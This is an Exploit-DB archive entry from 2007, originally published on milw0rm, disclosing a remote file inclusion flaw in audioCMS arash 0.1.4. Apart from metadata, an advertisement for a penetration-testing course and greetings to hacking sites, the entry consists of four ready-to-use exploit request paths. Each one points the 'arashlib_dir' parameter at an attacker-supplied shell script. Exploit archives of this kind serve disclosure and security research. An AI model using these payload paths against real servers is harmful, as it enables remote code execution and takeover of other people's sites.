audioCMS arash 0.1.4 - 'arashlib_dir' Remote File Inclusion

EDB-ID:

3744


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-04-15


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# audioCMS arash 0.1.4(arashlib_dir)Remote File Inclusion Vulnerabilities
# D.Script: http://sourceforge.net/projects/arash/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/arash_lib/include/edit.inc.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/include/list_features.inc.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/class/arash_gadmin.class.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/class/arash_sadmin.class.php?arashlib_dir=Shell
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-15]